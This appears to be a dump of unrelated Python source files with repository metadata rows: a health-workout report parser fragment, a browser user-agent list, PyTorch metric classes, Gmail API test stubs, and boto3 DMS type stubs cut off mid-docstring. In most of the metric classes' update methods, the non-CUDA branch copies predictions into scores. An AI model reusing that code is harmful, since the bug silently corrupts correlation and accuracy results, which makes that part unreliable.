data_headers = ('Start Date','End Date','Workout Type','Duration in Min.','Calories Burned','Distance in KM','Distance in Miles','Total Base Energy Burned','Goal Type','Goal','Flights Climbed','Steps' )
report.write_artifact_data_table(data_headers, data_list, file_found)
report.end_artifact_report()
tsvname = 'Health Workout General'
tsv(report_folder, data_headers, data_list, tsvname)
tlactivity = 'Health Workout General'
timeline(report_folder, tlactivity, data_list)
else:
logfunc('No data available in Workout General')
| 42.129278 | 259 | 0.575181 | 2,429 | 22,160 | 5.079457 | 0.081927 | 0.03242 | 0.028449 | 0.030799 | 0.85111 | 0.849165 | 0.828335 | 0.817637 | 0.805722 | 0.788702 | 0 | 0.027168 | 0.335605 | 22,160 | 525 | 260 | 42.209524 | 0.81084 | 0 | 0 | 0.744361 | 0 | 0 | 0.482416 | 0.076864 | 0 | 0 | 0 | 0 | 0 | 1 | 0.002506 | false | 0 | 0.032581 | 0 | 0.035088 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3b21be156b78cb4c6c4ebd213b17e965a1c66b85 | 1,314 | py | Python | desktopAgents.py | Joshua-amare/Word-Analyzer | 8985c846d858412ef96d052f99434e891aa22e1c | [
"MIT"
] | null | null | null | desktopAgents.py | Joshua-amare/Word-Analyzer | 8985c846d858412ef96d052f99434e891aa22e1c | [
"MIT"
] | null | null | null | desktopAgents.py | Joshua-amare/Word-Analyzer | 8985c846d858412ef96d052f99434e891aa22e1c | [
"MIT"
] | null | null | null | desktop_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0']
| 119.454545 | 141 | 0.636986 | 228 | 1,314 | 3.640351 | 0.179825 | 0.096386 | 0.108434 | 0.20241 | 0.895181 | 0.895181 | 0.895181 | 0.895181 | 0.895181 | 0.895181 | 0 | 0.244681 | 0.21309 | 1,314 | 10 | 142 | 131.4 | 0.558027 | 0 | 0 | 0 | 0 | 1 | 0.83819 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
3b6bf45dbe25c84f022b581b3c780d4eaa5faf61 | 5,947 | py | Python | model/metrics.py | deep-spin/explainable-qe-shared-task | da517a9a76f6dc0c68113e2d6be830f5b57726a7 | [
"MIT"
] | 5 | 2021-10-10T17:40:05.000Z | 2022-03-08T08:52:10.000Z | model/metrics.py | deep-spin/explainable-qe-shared-task | da517a9a76f6dc0c68113e2d6be830f5b57726a7 | [
"MIT"
] | null | null | null | model/metrics.py | deep-spin/explainable-qe-shared-task | da517a9a76f6dc0c68113e2d6be830f5b57726a7 | [
"MIT"
] | 1 | 2022-03-08T08:52:12.000Z | 2022-03-08T08:52:12.000Z | # -*- coding: utf-8 -*-
import warnings
import torch
from pytorch_lightning.metrics import Metric
from scipy.stats import kendalltau, pearsonr
from sklearn.metrics import matthews_corrcoef, roc_auc_score, average_precision_score
class Kendall(Metric):
def __init__(self, dist_sync_on_step=False, padding=None, ignore=None):
super().__init__(dist_sync_on_step=dist_sync_on_step)
self.add_state("predictions", default=[], dist_reduce_fx="sum")
self.add_state("scores", default=[], dist_reduce_fx="sum")
def update(self, predictions: torch.Tensor, scores: torch.Tensor):
assert predictions.shape == scores.shape
self.predictions += predictions.cpu().tolist() if predictions.is_cuda else predictions.tolist()
self.scores += scores.cpu().tolist() if scores.is_cuda else predictions.tolist()
def compute(self):
with warnings.catch_warnings():
# this will suppress all warnings in this block
warnings.simplefilter("ignore")
if len(self.predictions) == 0:
self.predictions.append(0)
self.scores.append(0)
if len(self.predictions) == 1:
self.predictions.append(0)
self.scores.append(0)
return torch.tensor(kendalltau(self.predictions, self.scores)[0], dtype=torch.float32)
class Pearson(Metric):
def __init__(self, dist_sync_on_step=False, padding=None, ignore=None):
super().__init__(dist_sync_on_step=dist_sync_on_step)
self.add_state("predictions", default=[], dist_reduce_fx="sum")
self.add_state("scores", default=[], dist_reduce_fx="sum")
def update(self, predictions: torch.Tensor, scores: torch.Tensor):
assert predictions.shape == scores.shape
self.predictions += predictions.cpu().tolist() if predictions.is_cuda else predictions.tolist()
self.scores += scores.cpu().tolist() if scores.is_cuda else predictions.tolist()
def compute(self):
with warnings.catch_warnings():
# this will suppress all warnings in this block
warnings.simplefilter("ignore")
if len(self.predictions) == 0:
self.predictions.append(0)
self.scores.append(0)
if len(self.predictions) == 1:
self.predictions.append(0)
self.scores.append(0)
return torch.tensor(pearsonr(self.predictions, self.scores)[0], dtype=torch.float32)
class Accuracy(Metric):
def __init__(self, dist_sync_on_step=False, padding=None, ignore=None):
super().__init__(dist_sync_on_step=dist_sync_on_step)
self.add_state("predictions", default=[], dist_reduce_fx="sum")
self.add_state("scores", default=[], dist_reduce_fx="sum")
def update(self, predictions: torch.Tensor, scores: torch.Tensor):
self.predictions += predictions.cpu().tolist() if predictions.is_cuda else predictions.tolist()
self.scores += scores.cpu().tolist() if scores.is_cuda else predictions.tolist()
def compute(self):
with warnings.catch_warnings():
# this will suppress all warnings in this block
warnings.simplefilter("ignore")
return torch.mean((torch.tensor(self.predictions) == torch.tensor(self.scores)).float())
class MCC(Metric):
def __init__(self, dist_sync_on_step=False, padding=None, ignore=None):
super().__init__(dist_sync_on_step=dist_sync_on_step)
self.add_state("predictions", default=[], dist_reduce_fx="sum")
self.add_state("scores", default=[], dist_reduce_fx="sum")
def update(self, predictions: torch.Tensor, scores: torch.Tensor):
self.predictions += predictions.flatten().cpu().tolist() if predictions.is_cuda else predictions.tolist()
self.scores += scores.flatten().cpu().tolist() if scores.is_cuda else predictions.tolist()
def compute(self):
with warnings.catch_warnings():
# this will suppress all warnings in this block
warnings.simplefilter("ignore")
return torch.tensor(matthews_corrcoef(self.scores, self.predictions))
class AUC(Metric):
def __init__(self, dist_sync_on_step=False, padding=None, ignore=None):
super().__init__(dist_sync_on_step=dist_sync_on_step)
self.add_state("predictions", default=[], dist_reduce_fx="sum")
self.add_state("scores", default=[], dist_reduce_fx="sum")
def update(self, predictions: torch.Tensor, scores: torch.Tensor):
self.predictions += predictions.cpu().tolist() if predictions.is_cuda else predictions.tolist()
self.scores += scores.cpu().tolist() if scores.is_cuda else predictions.tolist()
def compute(self):
with warnings.catch_warnings():
# this will suppress all warnings in this block
warnings.simplefilter("ignore")
try:
return roc_auc_score(self.scores, self.predictions)
except ValueError:
return 0.0
class AveragePrecision(Metric):
def __init__(self, dist_sync_on_step=False, padding=None, ignore=None):
super().__init__(dist_sync_on_step=dist_sync_on_step)
self.add_state("predictions", default=[], dist_reduce_fx="sum")
self.add_state("scores", default=[], dist_reduce_fx="sum")
def update(self, predictions: torch.Tensor, scores: torch.Tensor):
self.predictions += predictions.cpu().tolist() if predictions.is_cuda else predictions.tolist()
self.scores += scores.cpu().tolist() if scores.is_cuda else predictions.tolist()
def compute(self):
with warnings.catch_warnings():
# this will suppress all warnings in this block
warnings.simplefilter("ignore")
try:
return average_precision_score(self.scores, self.predictions)
except ValueError:
return 0.0
| 45.746154 | 113 | 0.667563 | 732 | 5,947 | 5.195355 | 0.112022 | 0.102551 | 0.047331 | 0.066263 | 0.893505 | 0.893505 | 0.893505 | 0.893505 | 0.893505 | 0.868262 | 0 | 0.00492 | 0.213889 | 5,947 | 129 | 114 | 46.100775 | 0.808556 | 0.049941 | 0 | 0.804124 | 0 | 0 | 0.03084 | 0 | 0 | 0 | 0 | 0 | 0.020619 | 1 | 0.185567 | false | 0 | 0.051546 | 0 | 0.381443 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3b8461f3404bfb6a4ebe6bd089fc29dfa4f247f8 | 214 | py | Python | eprun/__init__.py | stevenkfirth/eprun | 2a580f8ac0b5976cb1bc84328ffb821bd31731e6 | [
"MIT"
] | 5 | 2021-05-22T19:13:13.000Z | 2022-03-07T04:54:08.000Z | eprun/__init__.py | stevenkfirth/eprun | 2a580f8ac0b5976cb1bc84328ffb821bd31731e6 | [
"MIT"
] | null | null | null | eprun/__init__.py | stevenkfirth/eprun | 2a580f8ac0b5976cb1bc84328ffb821bd31731e6 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from .eprun import runsim
from .eprun import EPEnd
from .eprun import EPErr
from .eprun import EPEso
from .epjson import read_epjson
from .epjson import read_idf
from .epjson import EPJSON
| 21.4 | 31 | 0.766355 | 33 | 214 | 4.909091 | 0.393939 | 0.222222 | 0.37037 | 0.246914 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005556 | 0.158879 | 214 | 9 | 32 | 23.777778 | 0.894444 | 0.098131 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8e80cb4dd7c09a0018cee75e50ec3af240d4d027 | 180 | py | Python | tests/test_examples/imagenet_test/test/simpleAICV/classification/backbones/__init__.py | guohaoyu110/taivision | eb78bd079d98a58dcbc4995e9f04198bc6592e2b | [
"BSD-2-Clause"
] | null | null | null | tests/test_examples/imagenet_test/test/simpleAICV/classification/backbones/__init__.py | guohaoyu110/taivision | eb78bd079d98a58dcbc4995e9f04198bc6592e2b | [
"BSD-2-Clause"
] | null | null | null | tests/test_examples/imagenet_test/test/simpleAICV/classification/backbones/__init__.py | guohaoyu110/taivision | eb78bd079d98a58dcbc4995e9f04198bc6592e2b | [
"BSD-2-Clause"
] | null | null | null | # from .darknet import *
# from .efficientnet import *
# from .regnet import *
# from .repvgg import *
from .resnet import *
# from .resnetforcifar import *
# from .vovnet import * | 25.714286 | 31 | 0.705556 | 21 | 180 | 6.047619 | 0.428571 | 0.472441 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.183333 | 180 | 7 | 32 | 25.714286 | 0.863946 | 0.811111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d9174550fda9a2e8c5e6513ad82744995bd408b5 | 10,176 | py | Python | test/test_users_api.py | CanopyIQ/gmail_client | 5af519cf6d350f2b2645b85fe9692811f7a9feeb | [
"MIT"
] | null | null | null | test/test_users_api.py | CanopyIQ/gmail_client | 5af519cf6d350f2b2645b85fe9692811f7a9feeb | [
"MIT"
] | null | null | null | test/test_users_api.py | CanopyIQ/gmail_client | 5af519cf6d350f2b2645b85fe9692811f7a9feeb | [
"MIT"
] | null | null | null | # coding: utf-8
"""
Gmail
Access Gmail mailboxes including sending user email.
OpenAPI spec version: v1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import gmail_client
from gmail_client.rest import ApiException
from gmail_client.apis.users_api import UsersApi
class TestUsersApi(unittest.TestCase):
""" UsersApi unit test stubs """
def setUp(self):
self.api = gmail_client.apis.users_api.UsersApi()
def tearDown(self):
pass
def test_gmail_users_drafts_create(self):
"""
Test case for gmail_users_drafts_create
"""
pass
def test_gmail_users_drafts_delete(self):
"""
Test case for gmail_users_drafts_delete
"""
pass
def test_gmail_users_drafts_get(self):
"""
Test case for gmail_users_drafts_get
"""
pass
def test_gmail_users_drafts_list(self):
"""
Test case for gmail_users_drafts_list
"""
pass
def test_gmail_users_drafts_send(self):
"""
Test case for gmail_users_drafts_send
"""
pass
def test_gmail_users_drafts_update(self):
"""
Test case for gmail_users_drafts_update
"""
pass
def test_gmail_users_get_profile(self):
"""
Test case for gmail_users_get_profile
"""
pass
def test_gmail_users_history_list(self):
"""
Test case for gmail_users_history_list
"""
pass
def test_gmail_users_labels_create(self):
"""
Test case for gmail_users_labels_create
"""
pass
def test_gmail_users_labels_delete(self):
"""
Test case for gmail_users_labels_delete
"""
pass
def test_gmail_users_labels_get(self):
"""
Test case for gmail_users_labels_get
"""
pass
def test_gmail_users_labels_list(self):
"""
Test case for gmail_users_labels_list
"""
pass
def test_gmail_users_labels_patch(self):
"""
Test case for gmail_users_labels_patch
"""
pass
def test_gmail_users_labels_update(self):
"""
Test case for gmail_users_labels_update
"""
pass
def test_gmail_users_messages_attachments_get(self):
"""
Test case for gmail_users_messages_attachments_get
"""
pass
def test_gmail_users_messages_batch_delete(self):
"""
Test case for gmail_users_messages_batch_delete
"""
pass
def test_gmail_users_messages_batch_modify(self):
"""
Test case for gmail_users_messages_batch_modify
"""
pass
def test_gmail_users_messages_delete(self):
"""
Test case for gmail_users_messages_delete
"""
pass
def test_gmail_users_messages_get(self):
"""
Test case for gmail_users_messages_get
"""
pass
def test_gmail_users_messages_import(self):
"""
Test case for gmail_users_messages_import
"""
pass
def test_gmail_users_messages_insert(self):
"""
Test case for gmail_users_messages_insert
"""
pass
def test_gmail_users_messages_list(self):
"""
Test case for gmail_users_messages_list
"""
pass
def test_gmail_users_messages_modify(self):
"""
Test case for gmail_users_messages_modify
"""
pass
def test_gmail_users_messages_send(self):
"""
Test case for gmail_users_messages_send
"""
pass
def test_gmail_users_messages_trash(self):
"""
Test case for gmail_users_messages_trash
"""
pass
def test_gmail_users_messages_untrash(self):
"""
Test case for gmail_users_messages_untrash
"""
pass
def test_gmail_users_settings_filters_create(self):
"""
Test case for gmail_users_settings_filters_create
"""
pass
def test_gmail_users_settings_filters_delete(self):
"""
Test case for gmail_users_settings_filters_delete
"""
pass
def test_gmail_users_settings_filters_get(self):
"""
Test case for gmail_users_settings_filters_get
"""
pass
def test_gmail_users_settings_filters_list(self):
"""
Test case for gmail_users_settings_filters_list
"""
pass
def test_gmail_users_settings_forwarding_addresses_create(self):
"""
Test case for gmail_users_settings_forwarding_addresses_create
"""
pass
def test_gmail_users_settings_forwarding_addresses_delete(self):
"""
Test case for gmail_users_settings_forwarding_addresses_delete
"""
pass
def test_gmail_users_settings_forwarding_addresses_get(self):
"""
Test case for gmail_users_settings_forwarding_addresses_get
"""
pass
def test_gmail_users_settings_forwarding_addresses_list(self):
"""
Test case for gmail_users_settings_forwarding_addresses_list
"""
pass
def test_gmail_users_settings_get_auto_forwarding(self):
"""
Test case for gmail_users_settings_get_auto_forwarding
"""
pass
def test_gmail_users_settings_get_imap(self):
"""
Test case for gmail_users_settings_get_imap
"""
pass
def test_gmail_users_settings_get_pop(self):
"""
Test case for gmail_users_settings_get_pop
"""
pass
def test_gmail_users_settings_get_vacation(self):
"""
Test case for gmail_users_settings_get_vacation
"""
pass
def test_gmail_users_settings_send_as_create(self):
"""
Test case for gmail_users_settings_send_as_create
"""
pass
def test_gmail_users_settings_send_as_delete(self):
"""
Test case for gmail_users_settings_send_as_delete
"""
pass
def test_gmail_users_settings_send_as_get(self):
"""
Test case for gmail_users_settings_send_as_get
"""
pass
def test_gmail_users_settings_send_as_list(self):
"""
Test case for gmail_users_settings_send_as_list
"""
pass
def test_gmail_users_settings_send_as_patch(self):
"""
Test case for gmail_users_settings_send_as_patch
"""
pass
def test_gmail_users_settings_send_as_smime_info_delete(self):
"""
Test case for gmail_users_settings_send_as_smime_info_delete
"""
pass
def test_gmail_users_settings_send_as_smime_info_get(self):
"""
Test case for gmail_users_settings_send_as_smime_info_get
"""
pass
def test_gmail_users_settings_send_as_smime_info_insert(self):
"""
Test case for gmail_users_settings_send_as_smime_info_insert
"""
pass
def test_gmail_users_settings_send_as_smime_info_list(self):
"""
Test case for gmail_users_settings_send_as_smime_info_list
"""
pass
def test_gmail_users_settings_send_as_smime_info_set_default(self):
"""
Test case for gmail_users_settings_send_as_smime_info_set_default
"""
pass
def test_gmail_users_settings_send_as_update(self):
"""
Test case for gmail_users_settings_send_as_update
"""
pass
def test_gmail_users_settings_send_as_verify(self):
"""
Test case for gmail_users_settings_send_as_verify
"""
pass
def test_gmail_users_settings_update_auto_forwarding(self):
"""
Test case for gmail_users_settings_update_auto_forwarding
"""
pass
def test_gmail_users_settings_update_imap(self):
"""
Test case for gmail_users_settings_update_imap
"""
pass
def test_gmail_users_settings_update_pop(self):
"""
Test case for gmail_users_settings_update_pop
"""
pass
def test_gmail_users_settings_update_vacation(self):
"""
Test case for gmail_users_settings_update_vacation
"""
pass
def test_gmail_users_stop(self):
"""
Test case for gmail_users_stop
"""
pass
def test_gmail_users_threads_delete(self):
"""
Test case for gmail_users_threads_delete
"""
pass
def test_gmail_users_threads_get(self):
"""
Test case for gmail_users_threads_get
"""
pass
def test_gmail_users_threads_list(self):
"""
Test case for gmail_users_threads_list
"""
pass
def test_gmail_users_threads_modify(self):
"""
Test case for gmail_users_threads_modify
"""
pass
def test_gmail_users_threads_trash(self):
"""
Test case for gmail_users_threads_trash
"""
pass
def test_gmail_users_threads_untrash(self):
"""
Test case for gmail_users_threads_untrash
"""
pass
def test_gmail_users_watch(self):
"""
Test case for gmail_users_watch
"""
pass
if __name__ == '__main__':
unittest.main()
| 19.091932 | 73 | 0.586085 | 1,127 | 10,176 | 4.787045 | 0.077196 | 0.229842 | 0.126413 | 0.183874 | 0.916404 | 0.899907 | 0.732901 | 0.435218 | 0.224652 | 0.11177 | 0 | 0.000304 | 0.353675 | 10,176 | 532 | 74 | 19.12782 | 0.819979 | 0.29884 | 0 | 0.456522 | 1 | 0 | 0.001583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.463768 | false | 0.456522 | 0.057971 | 0 | 0.528986 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 9 |
d9202f18c8cd86ea54e0e8b4a334fd56e87127a1 | 160 | py | Python | template/{{cookiecutter.repository_name}}/{{cookiecutter.package_name}}/problem/__init__.py | Aiwizo/ml-workflow | 88e104fce571dd3b76914626a52f9001342c07cc | [
"Apache-2.0"
] | 4 | 2020-09-23T15:39:24.000Z | 2021-09-12T22:11:00.000Z | template/{{cookiecutter.repository_name}}/{{cookiecutter.package_name}}/problem/__init__.py | Aiwizo/ml-workflow | 88e104fce571dd3b76914626a52f9001342c07cc | [
"Apache-2.0"
] | 4 | 2020-09-23T15:07:39.000Z | 2020-10-30T10:26:24.000Z | template/{{cookiecutter.repository_name}}/{{cookiecutter.package_name}}/problem/__init__.py | Aiwizo/ml-workflow | 88e104fce571dd3b76914626a52f9001342c07cc | [
"Apache-2.0"
] | null | null | null | from {{cookiecutter.package_name}}.problem.example import Example
from {{cookiecutter.package_name}}.problem.evaluate_datasets import (
evaluate_datasets
)
| 32 | 69 | 0.8125 | 18 | 160 | 7 | 0.5 | 0.253968 | 0.365079 | 0.428571 | 0.539683 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0875 | 160 | 4 | 70 | 40 | 0.863014 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.5 | null | null | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
d97386b186c70aa7b2392d2a488c0ad8d7ac06b4 | 377,639 | py | Python | boto3_type_annotations_with_docs/boto3_type_annotations/dms/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 119 | 2018-12-01T18:20:57.000Z | 2022-02-02T10:31:29.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/dms/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 15 | 2018-11-16T00:16:44.000Z | 2021-11-13T03:44:18.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/dms/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 11 | 2019-05-06T05:26:51.000Z | 2021-09-28T15:27:59.000Z | from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from datetime import datetime
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def add_tags_to_resource(self, ResourceArn: str, Tags: List) -> Dict:
"""
Adds metadata tags to an AWS DMS resource, including replication instance, endpoint, security group, and migration task. These tags can also be used with cost allocation reporting to track cost associated with DMS resources, or used in a Condition statement in an IAM policy for DMS.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/AddTagsToResource>`_
**Request Syntax**
::
response = client.add_tags_to_resource(
ResourceArn='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type ResourceArn: string
:param ResourceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the AWS DMS resource the tag is to be added to. AWS DMS resources include a replication instance, endpoint, and a replication task.
:type Tags: list
:param Tags: **[REQUIRED]**
The tag to be assigned to the DMS resource.
- *(dict) --*
- **Key** *(string) --*
A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can only contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
- **Value** *(string) --*
A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can only contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
:rtype: dict
:returns:
"""
pass
def apply_pending_maintenance_action(self, ReplicationInstanceArn: str, ApplyAction: str, OptInType: str) -> Dict:
"""
Applies a pending maintenance action to a resource (for example, to a replication instance).
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/ApplyPendingMaintenanceAction>`_
**Request Syntax**
::
response = client.apply_pending_maintenance_action(
ReplicationInstanceArn='string',
ApplyAction='string',
OptInType='string'
)
**Response Syntax**
::
{
'ResourcePendingMaintenanceActions': {
'ResourceIdentifier': 'string',
'PendingMaintenanceActionDetails': [
{
'Action': 'string',
'AutoAppliedAfterDate': datetime(2015, 1, 1),
'ForcedApplyDate': datetime(2015, 1, 1),
'OptInStatus': 'string',
'CurrentApplyDate': datetime(2015, 1, 1),
'Description': 'string'
},
]
}
}
**Response Structure**
- *(dict) --*
- **ResourcePendingMaintenanceActions** *(dict) --*
The AWS DMS resource that the pending maintenance action will be applied to.
- **ResourceIdentifier** *(string) --*
The Amazon Resource Name (ARN) of the DMS resource that the pending maintenance action applies to. For information about creating an ARN, see `Constructing an Amazon Resource Name (ARN) <https://docs.aws.amazon.com/dms/latest/UserGuide/USER_Tagging.html#USER_Tagging.ARN>`__ in the DMS documentation.
- **PendingMaintenanceActionDetails** *(list) --*
Detailed information about the pending maintenance action.
- *(dict) --*
- **Action** *(string) --*
The type of pending maintenance action that is available for the resource.
- **AutoAppliedAfterDate** *(datetime) --*
The date of the maintenance window when the action will be applied. The maintenance action will be applied to the resource during its first maintenance window after this date. If this date is specified, any ``next-maintenance`` opt-in requests are ignored.
- **ForcedApplyDate** *(datetime) --*
The date when the maintenance action will be automatically applied. The maintenance action will be applied to the resource on this date regardless of the maintenance window for the resource. If this date is specified, any ``immediate`` opt-in requests are ignored.
- **OptInStatus** *(string) --*
Indicates the type of opt-in request that has been received for the resource.
- **CurrentApplyDate** *(datetime) --*
The effective date when the pending maintenance action will be applied to the resource. This date takes into account opt-in requests received from the ``ApplyPendingMaintenanceAction`` API, the ``AutoAppliedAfterDate`` , and the ``ForcedApplyDate`` . This value is blank if an opt-in request has not been received and nothing has been specified as ``AutoAppliedAfterDate`` or ``ForcedApplyDate`` .
- **Description** *(string) --*
A description providing more detail about the maintenance action.
:type ReplicationInstanceArn: string
:param ReplicationInstanceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the AWS DMS resource that the pending maintenance action applies to.
:type ApplyAction: string
:param ApplyAction: **[REQUIRED]**
The pending maintenance action to apply to this resource.
:type OptInType: string
:param OptInType: **[REQUIRED]**
A value that specifies the type of opt-in request, or undoes an opt-in request. An opt-in request of type ``immediate`` cannot be undone.
Valid values:
* ``immediate`` - Apply the maintenance action immediately.
* ``next-maintenance`` - Apply the maintenance action during the next maintenance window for the resource.
* ``undo-opt-in`` - Cancel any existing ``next-maintenance`` opt-in requests.
:rtype: dict
:returns:
"""
pass
def can_paginate(self, operation_name: str = None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:return: ``True`` if the operation can be paginated,
``False`` otherwise.
"""
pass
def create_endpoint(self, EndpointIdentifier: str, EndpointType: str, EngineName: str, Username: str = None, Password: str = None, ServerName: str = None, Port: int = None, DatabaseName: str = None, ExtraConnectionAttributes: str = None, KmsKeyId: str = None, Tags: List = None, CertificateArn: str = None, SslMode: str = None, ServiceAccessRoleArn: str = None, ExternalTableDefinition: str = None, DynamoDbSettings: Dict = None, S3Settings: Dict = None, DmsTransferSettings: Dict = None, MongoDbSettings: Dict = None, KinesisSettings: Dict = None, ElasticsearchSettings: Dict = None, RedshiftSettings: Dict = None) -> Dict:
"""
Creates an endpoint using the provided settings.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/CreateEndpoint>`_
**Request Syntax**
::
response = client.create_endpoint(
EndpointIdentifier='string',
EndpointType='source'|'target',
EngineName='string',
Username='string',
Password='string',
ServerName='string',
Port=123,
DatabaseName='string',
ExtraConnectionAttributes='string',
KmsKeyId='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
CertificateArn='string',
SslMode='none'|'require'|'verify-ca'|'verify-full',
ServiceAccessRoleArn='string',
ExternalTableDefinition='string',
DynamoDbSettings={
'ServiceAccessRoleArn': 'string'
},
S3Settings={
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'CsvRowDelimiter': 'string',
'CsvDelimiter': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'CompressionType': 'none'|'gzip',
'EncryptionMode': 'sse-s3'|'sse-kms',
'ServerSideEncryptionKmsKeyId': 'string',
'DataFormat': 'csv'|'parquet',
'EncodingType': 'plain'|'plain-dictionary'|'rle-dictionary',
'DictPageSizeLimit': 123,
'RowGroupLength': 123,
'DataPageSize': 123,
'ParquetVersion': 'parquet-1-0'|'parquet-2-0',
'EnableStatistics': True|False,
